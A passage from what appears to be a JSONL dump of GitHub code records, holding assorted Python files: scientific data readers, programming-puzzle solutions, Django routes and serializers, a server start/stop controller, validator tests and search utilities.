idx = idx + 1\r\n myFile.closed\r\n\r\n self.arrayVelocityPerp = 2. * np.pi * self.arrayFreqShift / self.arrayKapaPerp\r\n self.arrayElectricField = self.arrayVelocityPerp * self.arrayMagField\r\n\r\n def dischInFile(self):\r\n return np.unique(self.arrayDischNum)\r\n\r\n def giveDiagFreq(self, whichDisch=0):\r\n idx = np.where(self.arrayDischNum==whichDisch)\r\n return self.arrayDiagFreq[idx] if whichDisch!=0 else self.arrayDiagFreq\r\n\r\n def giveFreqShift(self, whichDisch=0):\r\n idx = np.where(self.arrayDischNum==whichDisch)\r\n return self.arrayFreqShift[idx] if whichDisch!=0 else self.arrayFreqShift\r\n \r\n def giveMaxKapaSpectrum(self, whichDisch=0):\r\n idx = np.where(self.arrayDischNum==whichDisch)\r\n return self.arrayKapaSpec[idx] if whichDisch!=0 else self.arrayKapaSpec\r\n\r\n def giveRho(self, whichDisch=0):\r\n idx = np.where(self.arrayDischNum==whichDisch)\r\n return self.arrayRho[idx] if whichDisch!=0 else self.arrayRho\r\n\r\n def giveUncerRho(self, whichDisch=0):\r\n idx = np.where(self.arrayDischNum==whichDisch)\r\n return self.arrayUncerRho[idx] if whichDisch!=0 else self.arrayUncerRho\r\n\r\n def giveKapaPerp(self, whichDisch=0):\r\n idx = np.where(self.arrayDischNum==whichDisch)\r\n return self.arrayKapaPerp[idx] if whichDisch!=0 else self.arrayKapaPerp\r\n\r\n def giveUnKapaPe(self, whichDisch=0):\r\n idx = np.where(self.arrayDischNum==whichDisch)\r\n return self.arrayUnKapaPe[idx] if whichDisch!=0 else self.arrayUnKapaPe\r\n\r\n def giveMagField(self, whichDisch=0):\r\n idx = np.where(self.arrayDischNum==whichDisch)\r\n return self.arrayMagField[idx] if whichDisch!=0 else self.arrayMagField\r\n\r\n def giveVelocityPerp(self, whichDisch=0):\r\n idx = np.where(self.arrayDischNum==whichDisch)\r\n return self.arrayVelocityPerp[idx] if whichDisch!=0 else self.arrayVelocityPerp\r\n\r\n def giveElectricField(self, whichDisch=0):\r\n idx = np.where(self.arrayDischNum==whichDisch)\r\n return self.arrayElectricField[idx] if whichDisch!=0 else self.arrayElectricField","repo_name":"ManolisMaragkoudakis/pycess_Data_MDR","sub_path":"readMdrData.py","file_name":"readMdrData.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30050069022","text":"# Jack 'O Lantern problem\n\ndef sep_and_multiply(int_string):\n \"\"\"A function to return a list of integers from whitespace separate string\"\"\"\n return [int(i) for i in int_string.split(\" \")]\n\ndef multiply_list(int_list):\n \"A function to multiple a list of integers\"\n t = 0\n multiple = 0\n for i in int_list:\n if t == 0:\n multiple = i\n t += 1\n else:\n multiple *= i\n t+=1\n return multiple\n\ndef main(int_string):\n \"Separates a list of integers and multiplies\"\n return multiply_list(sep_and_multiply(int_string))\n\nimport sys\ninput = sys.stdin.read()\nprint(main(input))","repo_name":"susieir/kattis","sub_path":"jackolantern.py","file_name":"jackolantern.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4780658166","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input()) # 컴퓨터의 수\nk = int(input()) # 직접 연결된 컴퓨터 쌍의 수\n\ngraph = [[] for _ in range(n+1)]\nvisited = [False for _ in range(n+1)] # 방문 여부\n\nfor _ in range(k):\n x, y = map(int,input().split())\n graph[x].append(y)\n graph[y].append(x)\n\ndef dfs(v):\n visited[v] = True # 방문 처리\n for node in graph[v]:\n if not visited[node]:\n dfs(node)\n\ndfs(1)\nprint(visited.count(True)-1)","repo_name":"jeilbitna/project","sub_path":"baekjoon/baekjoon2606.py","file_name":"baekjoon2606.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73913791159","text":"from django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('account/', include('django.contrib.auth.urls'), name=\"login\"),\n path('signup/', views.SignUp.as_view(), name='signup'),\n path('logout/', views.logout_view, name='logout'),\n\n path('ingredient/', views.IngredientList.as_view(), name=\"ingredientlist\"),\n path('menu/', views.MenuItemList.as_view(), name=\"menu\"),\n path('recipe/', views.RecipeRequirementList.as_view(), name=\"recipe\"),\n path('purchase/', views.PurchaseList.as_view(), name=\"purchase\"),\n path('inventory/', views.IngredientList.as_view(), name=\"inventory\"),\n\n\n path('ingredient/create', views.IngredientCreate.as_view(), name=\"ingredientcreate\"),\n path('menuitem/create', views.MenuItemCreate.as_view(), name=\"menuitemcreate\"),\n path('recipe/create', views.RecipeRequirementCreate.as_view(), name=\"recipecreate\"),\n path('purchase/create', views.PurchaseCreate.as_view(), name=\"purchasecreate\"),\n\n path('ingredient/update/<pk>', views.IngredientUpdate.as_view(), name=\"ingredientupdate\"),\n path('menuitem/update/<pk>', views.MenuItemUpdate.as_view(), name=\"menuitemupdate\"),\n path('recipe/update/<pk>', views.RecipeRequirementUpdate.as_view(), name=\"recipeupdate\"),\n path('purchase/update/<pk>', views.PurchaseUpdate.as_view(), name=\"purchaseupdate\"),\n\n path('ingredient/delete/<pk>', views.IngredientDelete.as_view(), name=\"ingredientdelete\"),\n path('menuitem/delete/<pk>', views.MenuItemDelete.as_view(), name=\"menuitemdelete\"),\n path('recipe/delete/<pk>', views.RecipeRequirementDelete.as_view(), name=\"recipedelete\"),\n path('purchase/delete/<pk>', views.PurchaseDelete.as_view(), name=\"purchasedelete\"),\n]","repo_name":"Crypto-Advisor/djangodelights","sub_path":"inventory/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3620668224","text":"\"\"\"\\\nWriters have a relatively limited vocabulary from which to choose words to open\nor close a sentence. We hypothesize that the choices subject to interference.\nThe value of this feature is the normalized frequency of tokens appearing in\nthe first, second, antepenultimate, penultimate and last positions in a\nsentence. We exclude sentences shorter than five tokens. Punctuation marks are\nconsidered as tokens in this feature, and for this reason the three last\npositions of a sentence are considered, while only the first two of them are\ninteresting for our purposes.\n\"\"\"\n\nimport translationese\nfrom translationese.utils import sparse_dict_increment\n\nPOSITION_NAMES = {\n \"first\": 0,\n \"second\": 1,\n \"antepenultimate\":-4,\n \"penultimate\":-3,\n \"last\":-2 # -1 is the period\n }\n\"\"\"Names of the various positions of the sentence, final period excluded.\"\"\"\n\ndef quantify(analysis):\n \"\"\"Analyze positional token frequency.\"\"\"\n assert isinstance(analysis, translationese.Analysis)\n\n result = {}\n\n for sentence in analysis.tokenized_sentences():\n if len(sentence) < 6:\n # Sentence has fewer than 5 tokens (and a period)\n continue\n for position_name, position in POSITION_NAMES.items():\n key = \"%s %s\" % (position_name, sentence[position])\n sparse_dict_increment(result, key)\n\n return result\n","repo_name":"lutzky/translationese","sub_path":"translationese/positional_token_frequency.py","file_name":"positional_token_frequency.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"39501851926","text":"from rest_framework import serializers\nfrom .models import Menu, MenuItem, DietOptions, MenuSections\n\nclass MenuItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = MenuItem\n fields = [\n 'id',\n 'name',\n 'description',\n 'price',\n 'section',\n 'diet',\n 'portion',\n 'created_at',\n 'updated_at'\n ]\n\nclass CreateMenuItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = MenuItem\n fields = [\n 'name',\n 'description',\n 'price',\n 'section',\n 'diet',\n 'portion'\n ]\n\nclass UpdateMenuItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = MenuItem\n fields = [\n 'name',\n 'description',\n 'price',\n 'section',\n 'diet',\n 'portion'\n 'updated_at'\n ]\n\n name = serializers.CharField(allow_blank=False, default=None)\n description = serializers.CharField(allow_blank=False, default=None)\n price = serializers.DecimalField(max_digits = 6, decimal_places = 2)\n section = serializers.ChoiceField(choices = MenuSections)\n diet = serializers.ChoiceField(choices = DietOptions)\n portion = serializers.IntegerField(min_value = 100, max_value = 1000)\n\n\nclass MenuSerializer(serializers.ModelSerializer):\n items = serializers.SerializerMethodField()\n class Meta:\n model = Menu\n fields = [\n 'id',\n 'name',\n 'description',\n 'items',\n 'created_at',\n 'updated_at'\n ]\n\n def get_items(self, obj):\n items = obj.items.all()\n serializer = MenuItemSerializer(items, many=True)\n return serializer.data\n\nclass CreateMenuSerializer(serializers.ModelSerializer):\n class Meta:\n model = Menu\n fields = ['name', 'description', 'items']\n\nclass UpdateMenuSerializer(serializers.ModelSerializer):\n class Meta:\n model = Menu\n fields = ['name', 'description', 'items', 'updated_at']\n\n name = serializers.CharField(allow_blank=False, default=None)\n description = serializers.CharField(allow_blank=False, default=None)\n items = MenuItemSerializer(many=True)","repo_name":"mihailapuste/chez-michel-django","sub_path":"menu/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26470467098","text":"#! /usr/bin/env python\n# -*-- coding: utf-8 -*-\n\nimport argparse\nimport fcntl\nimport os\nimport sys\nimport subprocess\nimport traceback\n\nfrom configparser import ConfigParser\nfrom configparser import NoOptionError\nfrom configparser import NoSectionError\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n\nfrom bin.ti_command.log import logger as log # noqa\n\n\nclass TiServerControl(object):\n \"\"\"\n Used to start or stop TiDB auto test Framework\n \"\"\"\n\n SUBPROCESS_ROOT = \"/\"\n ACTION_LIST = [\"start\", \"stop\", \"restart\"]\n TI_SERVER_SECTION = \"TiServer\"\n # ti server root path\n TI_ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n # path of tiDB framework control script\n TI_CTL_LOCK = os.path.join(TI_ROOT, \"ti_server_ctl_lock\")\n # path of ti server pid file\n TI_SERVER_PID = os.path.join(TI_ROOT, \"ti_server_pid\")\n # root path of tiDB test framework\n TI_SERVER_ROOT = os.path.join(TI_ROOT, \"ti_server\")\n\n def __init__(self, server_path, server):\n self.ti_server_path = os.path.join(server_path, server)\n self.ti_server_info = {\n \"host\": \"localhost\",\n \"port\": \"8020\"\n }\n\n @staticmethod\n def __pre_func():\n os.umask(0)\n\n @staticmethod\n def __exe_cmd(cmd, pid=False):\n pro = subprocess.Popen(\n args=cmd, shell=True, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, cwd=TiServerControl.SUBPROCESS_ROOT,\n preexec_fn=TiServerControl.__pre_func, close_fds=True\n )\n output = pro.communicate()\n code = pro.returncode\n if not pid:\n return code, output\n return pro.pid, code, output\n\n def __start_ti_server(self):\n log.info(\"begin to start ti-server..\")\n with open(TiServerControl.TI_CTL_LOCK, \"r+\") as fd:\n fcntl.flock(fd.fileno(), fcntl.LOCK_EX)\n is_run = self.is_ti_server_run()\n if is_run:\n log.info(\"ti server is run, exist ti_server_control\")\n else:\n start_cmd = \"python3 %s\" % self.ti_server_path\n for arg, value in self.ti_server_info.items():\n start_cmd = \"%s -%s %s\" % (start_cmd, arg, value)\n log.info(\"run ti-server start cmd: %s\" % start_cmd)\n pro = subprocess.Popen(start_cmd, close_fds=True, shell=True)\n self.set_ti_server_pid(pro.pid)\n log.info(\"start ti server successfully for: %s\" %\n self.ti_server_path)\n\n def __stop_ti_server(self):\n log.info(\"begin to stop ti-server..\")\n with open(TiServerControl.TI_CTL_LOCK, \"r+\") as fd:\n fcntl.flock(fd.fileno(), fcntl.LOCK_EX)\n is_run = self.is_ti_server_run()\n if not is_run:\n log.info(\"ti server is not run, exist ti_server_control\")\n else:\n ti_server_pid = self.get_ti_server_pid()\n kill_cmd = \"kill -9 %s\" % ti_server_pid\n code, output = self.__exe_cmd(kill_cmd)\n if code:\n log.error(\"ti server stop failed, code: %s, output: \"\n \"%s\" % (code, output))\n raise Exception(output[-1])\n if os.path.exists(self.TI_SERVER_PID):\n os.remove(self.TI_SERVER_PID)\n log.info(\"ti server stop successfully.\")\n\n @staticmethod\n def is_ti_server_run():\n if not os.path.exists(TiServerControl.TI_SERVER_PID):\n return False\n with open(TiServerControl.TI_SERVER_PID, \"r+\") as ti_pid:\n pid = ti_pid.read()\n cmdline_path = \"/proc/%s/cmdline\" % pid\n if not os.path.exists(cmdline_path):\n return False\n with open(cmdline_path, \"r+\") as fs_cmdline:\n cmdline_info = fs_cmdline.read()\n if not cmdline_info:\n return False\n return True\n\n def get_ti_server_pid(self):\n if not self.is_ti_server_run():\n return \"\"\n with open(TiServerControl.TI_SERVER_PID, \"r+\") as ti_pid:\n pid = ti_pid.read()\n return pid\n\n def set_ti_server_pid(self, pid):\n with open(self.TI_SERVER_PID, \"w+\") as fd_pid:\n fd_pid.write(str(pid))\n log.info(\"write ti-server pid to pid file: %s. pid: %s\"\n % (self.TI_SERVER_PID, pid))\n\n def operate_ti_server(self, action):\n if action == \"start\":\n self.__start_ti_server()\n\n elif action == \"stop\":\n self.__stop_ti_server()\n\n else:\n self.__stop_ti_server()\n self.__start_ti_server()\n\n def __load_config(self, config):\n if not os.path.exists(config):\n raise Exception(\"ti server configuration file not exist. \"\n \"path: %s\" % config)\n log.info(\"ti-server config path: %s\" % config)\n ti_config = ConfigParser()\n ti_config.read(config)\n if not ti_config.has_section(self.TI_SERVER_SECTION):\n log.info(\"there is not ti server configuration in config \"\n \"file: %s\" % config)\n raise NoSectionError(self.TI_SERVER_SECTION)\n for option in self.ti_server_info:\n if not ti_config.has_option(self.TI_SERVER_SECTION, option):\n log.info(\"there is not ti server %s in config \"\n \"file: %s\" % (option, config))\n raise NoOptionError(option, self.TI_SERVER_SECTION)\n self.ti_server_info[option] = \\\n ti_config.get(self.TI_SERVER_SECTION, option)\n\n def run(self):\n args = init_options()\n log.info(\"input argument: %s\" % args)\n if args.config:\n self.__load_config(args.config)\n if args.action:\n action = args.action.lower()\n if action not in self.ACTION_LIST:\n log.error(\"action to control ti-server invalid.\")\n raise Exception(\"Action to control ti-server invalid.\")\n self.operate_ti_server(action)\n\n @staticmethod\n def change_group_own(_path):\n code, output = TiServerControl.__exe_cmd(\n \"sudo -n chgrp ${USER} -R %s\" % _path\n )\n if code:\n log.error(\"Change group of %s failed.\" % _path)\n log.info(\"Change group of %s successfully.\")\n return code\n\n\ndef init_options():\n parser = argparse.ArgumentParser()\n subparsers = \\\n parser.add_subparsers(metavar=\"<subcommand>\", dest=\"command_name\")\n command, help_info = \"control\", \"control ti-server\",\n parser_sub = subparsers.add_parser(command, help=help_info)\n parser_sub.add_argument(\"-a\", \"--action\", metavar=\"\", required=True,\n help=\"Action to control ti-server\")\n parser_sub.add_argument(\"-c\", \"--config\", metavar=\"\", required=True,\n help=\"configuration file of ti-server\")\n parsed_args = parser.parse_args()\n return parsed_args\n\n\nif __name__ == \"__main__\":\n log.init(\"ti_server_control\")\n\n ti_server = \"ti_server_process.py\"\n ti_server_root = TiServerControl.TI_SERVER_ROOT\n log.info(\"ti_server_root: %s, ti_server: %s\" % (ti_server_root, ti_server))\n\n if not os.path.exists(TiServerControl.TI_CTL_LOCK):\n with open(TiServerControl.TI_CTL_LOCK, \"w\"):\n TiServerControl.change_group_own(TiServerControl.TI_CTL_LOCK)\n\n try:\n ti_server_ctl = TiServerControl(ti_server_root, ti_server)\n ti_server_ctl.run()\n except Exception as e:\n log.error(\"operate ti-server failed. error: %s, trace: %s\" %\n (e, traceback.format_exc()))\n","repo_name":"qwasxj/ti_server","sub_path":"bin/ti_server_control.py","file_name":"ti_server_control.py","file_ext":"py","file_size_in_byte":7702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19319989891","text":"from menor_caminho.Map import Map\nimport heapq\nfrom blocos_deslizantes import Puzzle as puzzle_logic\nfrom blocos_deslizantes import GUI as puzzle_gui\nfrom blocos_deslizantes import test_cases as tc\nfrom menor_caminho.GUI import *\n\nmapa = Map('menor_caminho/australia.csv')\n\ndef Zero(*args):\n return 0\n\nclass Node:\n def __init__(self, state, g, h):\n self.state = state\n self.g = g\n self.h = h\n self.f = g + h\n self.previous = None\n def __lt__(self, other_node):\n return self.f < other_node.f\n\n\nclass Search:\n def __init__(self, initial, next_states, goal, h, g = None):\n self.type = \"A star\"\n if not g:\n g = Zero\n self.type = \"Greedy\"\n self.g = g #function g : custo real para chegar ao estado\n self.h = h #function h : custo estimado minimo\n self.goal = goal #goal state : estado objetivo\n self.initial = initial #inital state : estado inicial\n self.next_states = next_states #function next_states: retorna o array dos proximos estados\n self.path = [initial] #array path : vetor do caminho a percorrer \n \n\n def execute(self):\n # Salva os estados ja visitados\n closed_states = set()\n # Dicionario estado->no\n direct = {}\n # Cria o no do estado inicial e adiciona ao heap\n new_node = Node(state = self.initial,g = 0, h = self.h(self.initial,self.goal))\n direct[self.initial] = new_node\n open_node_heap = [new_node]\n # Enquanto o estado final nao e visitado\n while self.goal not in closed_states:\n # Pega o no de menor valor e o estado dele\n actual_node = heapq.heappop(open_node_heap)\n actual_state = actual_node.state\n # Adiciona o estado de menor valor aos estados visitados\n closed_states.add(actual_state)\n # Analisa o estados vizinhos\n for state in self.next_states(actual_node.state):\n # Verifica se eles ja foram visitados\n if state not in closed_states:\n # Calcula o valor de 'g' e 'h' dos vizinhos\n new_g = actual_node.g + self.g(state, actual_state)\n new_h = self.h(state, self.goal)\n # Verifica se ja foram adicionados ao heap\n if direct.get(state) == None:\n # Caso nao tenham sido adicionados\n new_node = Node(state = state,g = new_g, h = new_h)\n new_node.previous = actual_node\n direct[state] = new_node\n # Adiciona na heap\n heapq.heappush(open_node_heap, new_node)\n else:\n # Caso tenham sido adicionados, compara os valores\n if new_g + new_h < direct[state].f:\n # Modifica os valores\n direct[state].g = new_g\n direct[state].h = new_h\n direct[state].f = new_g + new_h\n direct[state].previous = actual_node\n # Atualiza a heap\n heapq.heapify(open_node_heap)\n # Caminho gerado\n path = []\n actual_node = direct[self.goal]\n while actual_node.previous != None:\n path.append(actual_node.state)\n actual_node = actual_node.previous\n path.append(actual_node.state)\n path.reverse()\n print(\"Solucao achada({}): {}\".format(self.type, len(path)))\n\n return path\n\n\n\ndef Menor_caminho_utilizando_Greedy():\n path = Search(initial=mapa.get_id_city_name(\"Alice Springs\"), next_states=mapa.next, goal= mapa.get_id_city_name(\"Yulara\"), h = mapa.distance).execute()\n print(\"Custo total:\", mapa.path_cost(path))\n print(\"Caminho achado:\\n\",mapa.show_path(path))\n MapDraw(mapa.cidades, path)\n\ndef Menor_caminho_utilizando_A():\n path = Search(initial=mapa.get_id_city_name(\"Alice Springs\"), next_states=mapa.next, goal= mapa.get_id_city_name(\"Yulara\"), h = mapa.distance, g = mapa.cost).execute() \n print(\"Custo total:\", mapa.path_cost(path))\n print(\"Caminho achado:\\n\",mapa.show_path(path))\n MapDraw(mapa.cidades, path)\n\nif __name__ == \"__main__\":\n # ------ inicio menor caminho --------------------\n # 1) Menor caminho utilizando Greedy:\n # Menor_caminho_utilizando_Greedy()\n # 2) Menor caminho utilizando A*:\n # Menor_caminho_utilizando_A()\n # ------ fim menor caminho -----------------------\n # ------ inicio blocos deslizantes ---------------\n node = puzzle_logic.Node() # passe no construtor o tamanho do board. O padrao eh 9\n goal_state = node.get_state()\n #### Escolha o caso a ser executado: descomente somente uma das tres linha abaixo####\n # node.shuffle() # passe no construtor uma tupla indicando minimo e maximo do numero de movimentos. O padrao eh (30, 50)\n # node.load_state(tc.test_case[\"easy\"])\n # node.load_state(tc.test_case[\"not_so_easy\"])\n initial_state = node.get_state()\n (g,h,next_states) = node.get_evaluation_functions()\n # 1) Blocos deslizantes utilizando Greedy:\n # solution = Search(initial=initial_state, next_states=next_states, goal=goal_state, h=h, g=g).execute() \n # puzzle_gui.Game(solution)\n # 2) Menor deslizantes utilizando A*:\n # solution = Search(initial=initial_state, next_states=next_states, goal=goal_state, h=h).execute() \n # puzzle_gui.Game(solution)\n # ------ fim blocos deslizantes ------------------\n\n pass\n","repo_name":"EricToshio/CTC-17","sub_path":"projeto-1/busca_informada.py","file_name":"busca_informada.py","file_ext":"py","file_size_in_byte":5734,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3937975246","text":"import logging\nfrom logging.handlers import RotatingFileHandler\nimport os\n\ndef set_up_logging(app):\n log_file_path = os.path.abspath(app.config['log_file'])\n if not os.path.exists(log_file_path):\n os.makedirs(os.path.dirname(log_file_path), exist_ok=True)\n handler = RotatingFileHandler(app.config['log_file'], maxBytes=10000, backupCount=1)\n handler.setLevel(logging.INFO)\n app.logger.addHandler(handler)","repo_name":"shankha117/peace","sub_path":"app/utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21472065125","text":"from qsm import lib\nfrom unittest.mock import patch\nimport re\nimport hypothesis\nimport faker\nimport pytest\nimport hypothesis.strategies as s\nfrom faker import providers\n\n\ndef test_run_exists():\n assert lib.run is not None\n\n# >>> RUN >>>\n# ~~~ DOM0 ~~~\n\n\ndef test_dom0_command_is_executed():\n with patch(\"qsm.lib.check_call\", return_value=0, autospec=True) as mock_check_call:\n lib.run(\"ls -l\", \"dom0\", \"user\")\n _arg = mock_check_call.call_args[0][0]\n assert re.search(\n r\"ls -l\", _arg), \"command was not executed in dom0\"\n\n\ndef test_dom0_command_is_executed_as_user():\n with patch(\"qsm.lib.check_call\", return_value=0, autospec=True) as mock_check_call:\n lib.run(\"ls -l\", \"dom0\", \"user\")\n _arg = mock_check_call.call_args[0][0]\n assert re.search(r\"sudo --user=user\",\n _arg), \"dom0 command was not executed as user\"\n\n\ndef test_dom0_command_is_executed_as_root():\n with patch(\"qsm.lib.check_call\", return_value=0, autospec=True) as mock_check_call:\n lib.run(\"ls -l\", \"dom0\", \"root\")\n _arg = mock_check_call.call_args[0][0]\n assert re.search(r\"sudo --user=root\",\n _arg), \"dom0 command was not executed as root\"\n\n# ~~~ DOMU ~~~\n\n\ndef test_domU_command_is_executed():\n with patch(\"qsm.lib.check_call\", return_value=0, autospec=True) as mock_check_call:\n lib.run(\"ls -l\", \"domU\", \"user\")\n _arg = mock_check_call.call_args[0][0]\n assert re.search(r\"^qvm-run[\\w\\W]+domU\",\n _arg), \"command was not executed in domU\"\n\n\ndef test_domU_command_is_executed_as_user():\n with patch(\"qsm.lib.check_call\", return_value=0, autospec=True) as mock_check_call:\n lib.run(\"ls -l\", \"domU\", \"user\")\n _arg = mock_check_call.call_args[0][0]\n assert re.search(r\"^qvm-run[\\w\\W]+--user user\",\n _arg), \"domU command not executed as user\"\n\n\ndef test_domU_command_is_executed_as_root():\n with patch(\"qsm.lib.check_call\", return_value=0, autospec=True) as mock_check_call:\n lib.run(\"ls -l\", \"domU\", \"root\")\n _arg = mock_check_call.call_args[0][0]\n assert re.search(r\"^qvm-run[\\w\\W]+--user root\",\n _arg), \"domU command not executed as root\"\n\n\n# >>> PREDICATES >>>\n# ~~~ is_ip() ~~~\ndef test__is_ip__happy_path():\n \"\"\"Test that any valid ipv4/v6 address will return True for network addresses when network=True\"\"\"\n fake = faker.Faker()\n fake.add_provider(providers.internet)\n test_cases = [\n fake.ipv4(network=False),\n fake.ipv4(network=True),\n fake.ipv6(network=False),\n fake.ipv6(network=True),\n ]\n\n for ip in test_cases:\n assert lib.is_ip(ip, network=True), \\\n \"should return True for {}\".format(ip)\n\n\ndef test__is_ip__network_true__happy_path():\n \"\"\"Test that any valid ipv4/v6 address will return True for non-network addresses when network=False\"\"\"\n fake = faker.Faker()\n fake.add_provider(providers.internet)\n test_cases = [\n fake.ipv4(network=False),\n fake.ipv6(network=False),\n ]\n\n for ip in test_cases:\n assert lib.is_ip(ip, network=False), \\\n \"should return True for {}\".format(ip)\n\n\ndef test__is_ip__not_net__negative():\n \"\"\"Test that a network ip will cause False to be returned, when network=False\"\"\"\n fake = faker.Faker()\n fake.add_provider(providers.internet)\n test_cases = [\n fake.ipv4(network=True),\n fake.ipv6(network=True),\n ]\n\n for ip in test_cases:\n assert not lib.is_ip(ip, network=False), \\\n \"should return False for {}\".format(ip)\n\n\n@hypothesis.given(s.one_of(s.text(), s.booleans(), s.integers(), s.floats(), s.lists(s.integers())))\ndef test__is_ip__invalid_type__negative_fuzz(value):\n \"\"\"Tests random types. IP addresses must be strings.\"\"\"\n assert not lib.is_ip(value), \\\n \"should return False for {}\".format(value)\n\n\n@pytest.mark.parametrize(\"value\", [\n \"1\",\n \"1,2\",\n \"1-2\",\n \"1-2,3\",\n \"4,1-2,3\",\n \"65535\",\n \"65534-65535\",\n \"2000,65534-65535\",\n])\ndef test__assert_valid_dstports__happy_path(value):\n assert lib.assert_valid_dstports(value), \\\n \"{} should return True\".format(value)\n\n\n@pytest.mark.parametrize(\"value\", [\n \"1 \",\n \"1+2\",\n \"65536\",\n \"100000\",\n \"0\",\n \"-\",\n \"-0\",\n \"1-0\",\n \"1--1\",\n \"-1\",\n])\ndef test__assert_valid_dstports__negative(value):\n with pytest.raises(AssertionError):\n lib.assert_valid_dstports(value)\n\n\n_valid_ports_strat = s.integers(min_value=1, max_value=65535)\n@hypothesis.given(_valid_ports_strat, _valid_ports_strat, _valid_ports_strat)\ndef test__assert_valid_dstports__happy_fuzz(one, two, three):\n \"\"\"Test a range of valid ports, in various configurations\"\"\"\n cases = [\n str(one),\n \"{},{}\".format(one, two),\n \"{},{}-{}\".format(one, two, three),\n \"{0},{1}-{2},{0}\".format(one, two, three),\n \"{0},{1}-{2},{0}-{2},{0}\".format(one, two, three)\n ]\n\n for case in cases:\n assert lib.assert_valid_dstports(str(case)), \\\n \"{} should return True\".format(case)\n\n\n_invalid_ports_strat_1 = s.integers(min_value=65536, max_value=100000)\n_invalid_ports_strat_2 = s.integers(min_value=-100000, max_value=0)\n@hypothesis.given(_invalid_ports_strat_1, _invalid_ports_strat_2, _invalid_ports_strat_1)\ndef test__assert_valid_dstports__negative_fuzz(one, two, three):\n \"\"\"Test a range of valid ports, in various configurations\"\"\"\n cases = [\n str(one),\n \"{},{}\".format(one, two),\n \"{},{}-{}\".format(one, two, three),\n \"{0},{1}-{2},{0}\".format(one, two, three),\n \"{0},{1}-{2},{0}-{2},{0}\".format(one, two, three)\n ]\n\n for case in cases:\n with pytest.raises(AssertionError):\n lib.assert_valid_dstports(str(case))\n\n\n@hypothesis.given(s.text())\ndef test__is_ip__fuzz_random_string(random_string):\n assert not lib.is_ip(random_string), \\\n \"should return False for {}\".format(random_string)\n\n\n# ~~~ is_meaningful_string() ~~~\n\ndef test_is_meaningful_string_rejects_empty_string():\n assert not lib.is_meaningful_string(\n \"\"), \"an empty string should be rejected\"\n\n\ndef test_is_meaningful_string_happy_path_fuzz():\n assert lib.is_meaningful_string(\"text\"), \"should be accepted\"\n\n\n# ~~~ is_mac() ~~~\n\ndef test_is_mac_accepts_mac():\n assert lib.is_mac(\"00:01:36:12:e6:ff\"), \"should accept a mac address\"\n\n\n@hypothesis.given(s.text())\ndef test_is_mac_rejects_non_mac(text):\n assert not lib.is_mac(text), \"should reject non-macs\"\n","repo_name":"0b10/qsm","sub_path":"src/qsm/tests/test_lib.py","file_name":"test_lib.py","file_ext":"py","file_size_in_byte":6606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36526486030","text":"from pytube import YouTube\n\n\nOUTPUT_PATH = \"../../downloaded-videos\"\nFILENAME_PREFIX = \"my_video_\"\n\n\nclass Video:\n def __init__(self, link: str):\n self.youtube_video = YouTube(link)\n\n self.link = link\n self.title = self.youtube_video.title\n self.views = self.youtube_video.views\n self.length = self.youtube_video.length\n self.author = self.youtube_video.author\n\n def download_video(self, output_path: str = OUTPUT_PATH, filename_prefix: str = FILENAME_PREFIX):\n self.youtube_video.streams.get_highest_resolution().download(\n output_path=output_path,\n filename_prefix=filename_prefix\n )\n print(f\"{self.title} download done. Saved in {output_path}\")\n\n def download_audio(self, output_path: str = OUTPUT_PATH, filename_prefix: str = FILENAME_PREFIX):\n self.youtube_video.streams.get_audio_only().download(\n output_path=output_path,\n filename_prefix=filename_prefix\n )\n print(f\"Audio from {self.title} downloaded. Saved in {output_path}\")\n","repo_name":"Ptrick97/video-downloader","sub_path":"src/video-downloader/models/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34490279768","text":"import xapian\nimport re\nfrom spotlyt.snowball import stopwords\nfrom spotlyt.constants import *\n\n_split_re = re.compile(r'<\\w+[^>]*>|</\\w+>|[\\w\\']+|\\s+|[^\\w\\'\\s<>/]+')\n_range_re = re.compile(\"(?P<start>[0-9]+)\\.\\.(?P<end>[0-9]+)?(:(?P<mode>asc|desc))?\")\n\nasync def query_parser(database, language):\n qp = xapian.QueryParser()\n qp.set_stemmer(xapian.Stem(language))\n qp.set_stemming_strategy(xapian.QueryParser.STEM_SOME)\n qp.set_database(database)\n\n return qp\n\n\nasync def do_spellcheck(queryparser, querystring): \n queryparser.parse_query(querystring, xapian.QueryParser.FLAG_SPELLING_CORRECTION)\n return queryparser.get_corrected_query_string().decode(\"utf8\")\n\n\nasync def do_stopwords(querystring, language):\n global stopwords\n _stopwords = stopwords.get(language)\n querylist = await split(querystring)\n querystring = \"\".join([x if x not in _stopwords else \"-\"+x for x in querylist])\n\n return querystring\n\nasync def split(text):\n return 